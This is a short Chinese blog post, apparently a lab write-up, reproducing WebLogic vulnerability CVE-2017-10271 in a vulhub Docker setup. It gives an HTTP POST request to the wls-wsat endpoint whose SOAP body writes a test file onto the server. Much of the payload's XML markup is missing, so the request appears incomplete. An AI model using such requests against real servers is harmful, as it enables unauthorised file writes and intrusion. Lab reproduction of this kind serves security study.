Weblogic(CVE-2017-10271)漏洞复现

1.搭环境
我用的vulhub进入weblogicCVE-2017-10271后用 docker-compose up -d
等待下载完成访问 你的IP+7001(端口)
会出现一个404报错界面,说明环境搭建成功
抓包构造一个POST包
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.28.145:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 661


soapenv:Header



servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt
hello




soapenv:Body/

Weblogic(CVE-2017-10271)漏洞复现_第1张图片
/wls-wsat/test.txt为文件路径test.txt为文件名hello为文件内容自己可以改
之后访问自己IP+7001端口+文件路径即可
例如 http://192.168.28.145:7001/wls-wsat/test.txt
Weblogic(CVE-2017-10271)漏洞复现_第2张图片

你可能感兴趣的:(漏洞复现)